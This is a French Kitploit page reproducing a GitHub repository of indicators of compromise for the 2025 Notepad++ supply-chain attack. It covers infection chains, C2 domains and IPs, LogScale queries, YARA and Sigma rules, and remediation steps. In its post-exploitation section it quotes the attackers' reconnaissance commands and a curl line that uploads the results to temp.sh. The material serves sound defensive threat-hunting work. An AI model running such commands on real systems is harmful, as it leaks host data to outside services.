Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
notepadpp-supply-chain-iocs — Indicateurs de compromission et règles de détection pour l'attaque de la chaîne d'approvisionnement de Notepad++ (CVE-2025-15556) — Lotus Blossom APT, juin–décembre 2025. Comprend des requêtes Falcon LogScale, des règles YARA/Sigma et la cartographie MITRE ATT&CK. | Kitploit
Outils/GitHubGitHub/renat0z3r0/notepadpp-supply-chain-iocs
Gestion des Indicateurs de Compromission (IOC)Flux et Agrégateurs de MenacesAnalyse des VulnérabilitésAnalyse ForensiqueAnalyse de MalwareRenseignement sur les MenacesSécurité de la Chaîne LogistiqueApprentissage et ÉducationRéponse aux Incidents

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
GitHubrenat0z3r0/notepadpp-supply-chain-iocs

notepadpp-supply-chain-iocs

Indicateurs de compromission et règles de détection pour l'attaque de la chaîne d'approvisionnement de Notepad++ (CVE-2025-15556) — Lotus Blossom APT, juin–décembre 2025. Comprend des requêtes Falcon LogScale, des règles YARA/Sigma et la cartographie MITRE ATT&CK.

Voir le dépôt
14il y a 7 moisPas encore vérifié
Partager

Attaque sur la chaîne d'approvisionnement de Notepad++ — Répertoire d'IoC

CVE-2025-15556 | Lotus Blossom / Raspberry Typhoon | Juin – Décembre 2025

Dernière mise à jour Nombre d'IoC Licence: MIT MITRE ATT&CK


Vue d'ensemble

Ce dépôt contient une collection complète et consolidée d'indicateurs de compromission (IoC) liée à l'attaque sur la chaîne d'approvisionnement de Notepad++ divulguée le 2 février 2026.

Entre juin et décembre 2025, un acteur malveillant parrainé par l'État chinois a compromis l'infrastructure d'hébergement de Notepad++, détournant le mécanisme de mise à jour intégré (WinGUp) pour distribuer sélectivement des installateurs trojanisés à des utilisateurs ciblés. L'attaque a exploité l'absence de vérification cryptographique dans le programme de mise à jour (avant la v8.8.9), permettant la distribution de portes dérobées personnalisées, de Cobalt Strike Beacons et de charges utiles Metasploit.

Faits clés

CVECVE-2025-15556 — Téléchargement de code sans vérification d'intégrité
Acteur malveillantLotus Blossom (Bilbug, Raspberry Typhoon, Thrip) / Zirconium (Violet Typhoon)
Période activeJuin 2025 – 2 décembre 2025
Vecteur d'attaqueCompromission de la chaîne d'approvisionnement via le mécanisme de mise à jour automatique WinGUp
CiblesGouvernement, télécommunications, services financiers, fournisseurs informatiques (Philippines, Vietnam, Salvador, Australie, Asie de l'Est)
Logiciels malveillantsPorte dérobée Chrysalis (personnalisée), Cobalt Strike Beacon, Metasploit Meterpreter
Corrigé dansNotepad++ v8.8.9+ (vérification de certificat) / v8.9.1+ (validation XMLDSig)

Chaînes d'infection

Kaspersky GReAT a identifié trois chaînes d'infection distinctes, changées environ mensuellement pour échapper à la détection :

Chaîne n°1 — Juillet/Août 2025

root@kitploit:~
GUP.exe → update.exe (NSIS) → ProShow.exe (légitime) → exploitation via fichier "load"
  → téléchargeur Metasploit → Cobalt Strike Beacon
  • Exploite une ancienne vulnérabilité du logiciel ProShow au lieu du DLL sideloading
  • Reconnaissance : whoami && tasklist → exfiltrée via temp.sh
  • Répertoire de travail : %appdata%\ProShow\

Chaîne n°2 — Septembre/Octobre 2025

root@kitploit:~
GUP.exe → update.exe (NSIS) → script.exe (interpréteur Lua) → alien.ini (Lua compilé)
  → shellcode via EnumWindowStationsW → téléchargeur Metasploit → Cobalt Strike Beacon
  • Utilise un interpréteur Lua légitime pour exécuter du shellcode compilé
  • Reconnaissance élargie : whoami && tasklist && systeminfo && netstat -ano
  • Répertoire de travail : %appdata%\Adobe\Scripts\

Chaîne n°3 — Octobre 2025

root@kitploit:~
GUP.exe → update.exe (NSIS) → BluetoothService.exe (légitime) → log.dll (sideloadé)
  → déchiffre le shellcode "BluetoothService" → porte dérobée Chrysalis
  • Technique classique de DLL sideloading
  • Aucune reconnaissance intégrée (contrairement aux chaînes 1 et 2)
  • Répertoire de travail : %appdata%\Bluetooth\
  • Cobalt Strike Beacon associé trouvé dans C:\ProgramData\USOShared\
root@kitploit:~
                     ┌─────────────────────────────────────────────────────────┐
                     │              CHRONOLOGIE DE LA COMPROMISSION           │
                     ├─────────┬─────────┬─────────┬─────────┬─────────┬──────┤
                     │  Juil25 │  Août25 │  Sept25 │  Oct25  │  Nov25  │Déc25 │
                     ├─────────┴─────────┴─────────┴─────────┴─────────┴──────┤
  Chaîne 1 (ProShow) │████████████████████                                    │
  Chaîne 2 (Lua)     │                    █████████████████████████████        │
  Chaîne 3 (DLL SL)  │                              ██████████████            │
  Accès infra        │████████████████████████████████████████████████████████│
                     └────────────────────────────────────────────────────────┘

Contenu du dépôt

FichierDescription
notepadpp_supply_chain_iocs.csvJeu de données complet des IoC (105 indicateurs) avec cartographie MITRE ATT&CK

Schéma du CSV

ColonneDescription
ioc_typeType : ip, domain, url, sha1, sha256, filepath, filename, useragent, behavior, cve, attribution, compromise_window
ioc_valueLa valeur de l'indicateur
chainChaîne d'infection (1, 2, 3, 1/2, 2/3, all, n/a)
contextDescription de ce que représente l'IoC
sourceSource de renseignement (Kaspersky, Rapid7, CrowdStrike, Tenable, Kevin Beaumont)
riskSévérité (CRITICAL, HIGH, MEDIUM, LOW, INFO)
mitre_techniqueIdentifiant de technique MITRE ATT&CK

Détection et chasse aux menaces

Indicateurs prioritaires (commencez ici)

Comportementaux — indépendants des IoC, valeur la plus élevée :

  • gup.exe générant tout processus enfant autre qu'un installateur légitime signé de Notepad++
  • gup.exe se connectant à des domaines/IP autres que notepad-plus-plus.org, github.com, release-assets.githubusercontent.com
  • Création de répertoires : %appdata%\ProShow\, %appdata%\Adobe\Scripts\, %appdata%\Bluetooth\
  • Création de %localappdata%\Temp\ns.tmp\ (runtime NSIS — présent dans toutes les chaînes)

Réseau — haute confiance :

  • Résolution DNS de cdncheck.it.com, safe-dns.it.com, self-dns.it.com, api.skycloudcenter.com, api.wiresguard.com
  • Connexions à temp.sh (51.91.79.17) — particulièrement avec téléchargement de fichier via curl
  • Requêtes HTTP avec des URLs temp.sh intégrées dans l'en-tête User-Agent
  • Connexions sortantes vers 45.76.155.202, 45.32.144.255, 95.179.213.0, 45.77.31.210

Commandes de reconnaissance (post-exploitation) :

root@kitploit:~
cmd /c whoami&&tasklist > 1.txt
cmd /c "whoami&&tasklist&&systeminfo&&netstat -ano" > a.txt
curl -F "[email protected]" -s https://temp.sh/upload

Requêtes CrowdStrike Falcon LogScale

Comportemental : chasse aux processus enfants de GUP.exe
root@kitploit:~
#event_simpleName=ProcessRollup2 event_platform=Win ParentBaseFileName="gup.exe"
| FilePath=/\\Device\\HarddiskVolume\d+(?<shortFilePath>.+$)/
| groupBy([FileName, SHA256HashData, shortFilePath, CommandLine])
Chasse multi-IoC sur les événements processus, réseau et DNS
root@kitploit:~
#event_simpleName=/(ProcessRollup2|NetworkConnectIP4|DnsRequest)/ event_platform=Win
| case {
    // IP malveillantes
    RemoteAddressIP4=/(95\.179\.213\.0|61\.4\.102\.97|59\.110\.7\.32|124\.222\.137\.114|45\.76\.155\.202|45\.32\.144\.255|45\.77\.31\.210)/
        | iocType := "IP malveillante" | iocValue := RemoteAddressIP4 | riskScore := "HIGH";
    // Domaines malveillants
    DomainName=/(api\.skycloudcenter\.com|api\.wiresguard\.com|cdncheck\.it\.com|safe-dns\.it\.com|self-dns\.it\.com|temp\.sh)/i
        | iocType := "Domaine malveillant" | iocValue := DomainName | riskScore := "HIGH";
    // Noms de fichiers suspects
    ImageFileName=/\\(BluetoothService|admin|system|loader1|loader2|s047t5g|ConsoleApplication2|3yzr31vk|uffhxpSy)\.exe$/i
        | iocType := "Nom de fichier suspect" | iocValue := ImageFileName | riskScore := "MEDIUM";
    // DLL suspectes
    ImageFileName=/\\(log\.dll|libtcc\.dll)$/i
        | iocType := "DLL suspecte" | iocValue := ImageFileName | riskScore := "MEDIUM";
    // Artefacts spécifiques aux chaînes
    ImageFileName=/\\(alien\.ini|load)$/i
        | iocType := "Artefact de chaîne" | iocValue := ImageFileName | riskScore := "HIGH";
    * | iocType := null;
}
| iocType=*
| ImageFileName=/\\(?<FileName>[^\\]+)$/
| table([riskScore, iocType, iocValue, @timestamp, aid, ComputerName, FileName, ImageFileName, CommandLine, SHA256HashData, RemoteAddressIP4, DomainName], limit=5000)
Détection de l'installateur NSIS (toutes les chaînes)
root@kitploit:~
#event_simpleName=DirectoryCreate event_platform=Win
| FilePath=/\\ns\.tmp$/i
| FilePath=/\\Temp\\ns\.tmp$/i
| groupBy([aid, ComputerName, FilePath, ContextTimeStamp], limit=5000)

Règle YARA (NSIS + motif de reconnaissance)

Règle YARA pour le programme de mise à jour NSIS malveillant
root@kitploit:~
rule Notepadpp_SupplyChain_MaliciousUpdater {
    meta:
        description = "Détecte les installateurs NSIS malveillants de l'attaque sur la chaîne d'approvisionnement de Notepad++"
        author = "Renato Z3r0 ed i miei sorcini"
        date = "2026-02"
        reference = "https://securelist.com/notepad-supply-chain-attack/118708/"
        tlp = "WHITE"
        
    strings:
        $nsis = "Nullsoft.NSIS" ascii
        $recon1 = "whoami" ascii nocase
        $recon2 = "tasklist" ascii nocase
        $recon3 = "systeminfo" ascii nocase
        $recon4 = "netstat -ano" ascii nocase
        $exfil = "temp.sh/upload" ascii nocase
        $curl = "curl" ascii nocase
        $dir1 = "\\ProShow\\" ascii nocase
        $dir2 = "\\Adobe\\Scripts\\" ascii nocase
        $dir3 = "\\Bluetooth\\" ascii nocase
        
    condition:
        uint16(0) == 0x5A4D and
        $nsis and
        (2 of ($recon*) or $exfil or ($curl and 1 of ($recon*))) and
        1 of ($dir*)
}

Règles Sigma

Sigma : processus enfant suspect de GUP.exe
root@kitploit:~
title: Notepad++ GUP.exe processus enfant suspect
id: a1b2c3d4-e5f6-7890-abcd-ef1234567890
status: experimental
description: Détecte GUP.exe (programme de mise à jour de Notepad++) générant des processus enfants suspects indiquant une compromission de la chaîne d'approvisionnement
author: Renato Z3r0 ed i miei sorcini
date: 2026/02/09
references:
    - https://securelist.com/notepad-supply-chain-attack/118708/
    - https://www.rapid7.com/blog/post/tr-chrysalis-backdoor-dive-into-lotus-blossoms-toolkit/
tags:
    - attack.initial_access
    - attack.t1195.002
    - cve.2025.15556
logsource:
    category: process_creation
    product: windows
detection:
    selection_parent:
        ParentImage|endswith: '\gup.exe'
    filter_legitimate:
        Image|endswith:
            - '\npp.Installer.x64.exe'
            - '\npp.Installer.exe'
    condition: selection_parent and not filter_legitimate
falsepositives:
    - Installateurs Notepad++ légitimes avec des noms non standard
level: high
Sigma : commandes de reconnaissance avec exfiltration via temp.sh
root@kitploit:~
title: Exfiltration de données de reconnaissance via temp.sh
id: b2c3d4e5-f6a7-8901-bcde-f12345678901
status: experimental
description: Détecte une reconnaissance système suivie d'un téléchargement de données vers temp.sh, comme observé dans l'attaque sur la chaîne d'approvisionnement de Notepad++
author: Renato Z3r0 ed i miei sorcini
date: 2026/02/09
references:
    - https://securelist.com/notepad-supply-chain-attack/118708/
tags:
    - attack.exfiltration
    - attack.t1567
    - attack.discovery
    - attack.t1082
logsource:
    category: process_creation
    product: windows
detection:
    selection_curl:
        CommandLine|contains:
            - 'temp.sh/upload'
            - 'temp.sh'
        Image|endswith: '\curl.exe'
    condition: selection_curl
falsepositives:
    - Utilisation légitime du service de partage de fichiers temp.sh (rare dans les environnements d'entreprise)
level: high
Sigma : résolution de domaine malveillant
root@kitploit:~
title: Résolution de domaine C2 de la chaîne d'approvisionnement Notepad++
id: c3d4e5f6-a7b8-9012-cdef-123456789012
status: experimental
description: Détecte la résolution DNS de domaines C2 associés à l'attaque sur la chaîne d'approvisionnement de Notepad++
author: Renato Z3r0 ed i miei sorcini
date: 2026/02/09
references:
    - https://securelist.com/notepad-supply-chain-attack/118708/
    - https://www.rapid7.com/blog/post/tr-chrysalis-backdoor-dive-into-lotus-blossoms-toolkit/
tags:
    - attack.command_and_control
    - attack.t1071.001
logsource:
    category: dns_query
    product: windows
detection:
    selection:
        QueryName|endswith:
            - 'cdncheck.it.com'
            - 'safe-dns.it.com'
            - 'self-dns.it.com'
            - 'api.skycloudcenter.com'
            - 'api.wiresguard.com'
    condition: selection
falsepositives:
    - Très peu probable dans les environnements d'entreprise
level: critical

Cartographie MITRE ATT&CK

TacticTechniqueIDUtilisation dans cette campagne
Accès initialCompromission de la chaîne d'approvisionnement : Compromission de la chaîne d'approvisionnement logicielleT1195.002Détournement du mécanisme de mise à jour WinGUp
ExécutionInterpréteur de commandes et de scripts : Interpréteur de commandes WindowsT1059.003Reconnaissance via cmd.exe
ExécutionInterpréteur de commandes et de scripts : Python/LuaT1059.006Chaîne n°2 interpréteur Lua
ExécutionExploitation pour exécution côté clientT1203Chaîne n°1 vulnérabilité ProShow
ExécutionAPI nativeT1106EnumWindowStationsW pour exécution de shellcode
PersistanceDétournement du flux d'exécution : DLL Side-LoadingT1574.002Chaîne n°3 sideloading de log.dll
Contournement des défensesFichiers ou informations obscursT1027Shellcode chiffré, clé XOR "CRAZY"
Contournement des défensesMasquage : Correspondance de nom légitimeT1036.005BluetoothService.exe, update.exe, AutoUpdater.exe
DécouverteDécouverte des informations systèmeT1082whoami, systeminfo, tasklist, netstat
CollecteMise en scène des données : Mise en scène locale des donnéesT1074.001Sortie de la reconnaissance enregistrée dans des fichiers .txt
Commande et contrôleProtocole de couche application : Protocoles web

Références

SourceLien
Kaspersky GReAT — Chaînes d'exécution inaperçues et nouveaux IoCsecurelist.com
Rapid7 — Porte dérobée Chrysalis : Plongée dans la boîte à outils de Lotus Blossomrapid7.com
Notepad++ Communication officielle — Mise à jour des informations sur l'incident de détournementnotepad-plus-plus.org
Kevin Beaumont — Divulgation et attribution initialesDoublePulsar
Tenable — FAQ sur la compromission de la chaîne d'approvisionnement de Notepad++tenable.com
Orca Security — Analyse du détournement de mise à jour et remédiationorca.security
CSO Online — APT chinois, attaque sophistiquée sur la chaîne d'approvisionnementcsoonline.com

Actions immédiates

  1. Identifier tous les terminaux avec Notepad++ installé (toute version < 8.9.1)
  2. Chasser les processus enfants inattendus générés par gup.exe entre juin et décembre 2025
  3. Rechercher dans les journaux réseau les connexions aux domaines C2 et aux IP listés ci-dessus
  4. Vérifier la présence des artefacts système (%appdata%\ProShow\, %appdata%\Adobe\Scripts\, %appdata%\Bluetooth\)
  5. Mettre à jour Notepad++ vers la v8.9.1+ en utilisant un installateur téléchargé manuellement depuis les versions officielles GitHub
  6. Supprimer tout ancien certificat racine personnalisé installé par les versions précédentes de Notepad++
  7. Isoler et trier tout terminal présentant des indicateurs positifs

Journal des modifications

DateChangement
2026-02-09Version initiale — 105 IoC consolidés provenant de Kaspersky, Rapid7, CrowdStrike, Tenable

Licence

Ce dépôt est fourni sous Licence MIT. Les IoC sont agrégés à partir de sources publiques à des fins défensives uniquement.


Contribution

Les contributions sont les bienvenues. Si vous avez des IoC supplémentaires, des règles de détection ou des corrections :

  1. Forkez le dépôt
  2. Ajoutez vos indicateurs au CSV (en respectant le schéma)
  3. Soumettez une pull request avec des références à la source

Avertissement : Ce dépôt est destiné uniquement à des fins défensives en cybersécurité. Les IoC et les règles de détection sont fournis en l'état pour aider les organisations à évaluer leur exposition à cette compromission de la chaîne d'approvisionnement.

Télécharger l’outil
T1071.001
C2 HTTPS via Cobalt Strike, Chrysalis
Commande et contrôleCanal chiffréT1573Configuration chiffrée du Beacon CS
Commande et contrôleTransfert d'outil entrantT1105Téléchargeur Metasploot récupérant le Beacon CS
ExfiltrationExfiltration via service webT1567Téléchargement vers temp.sh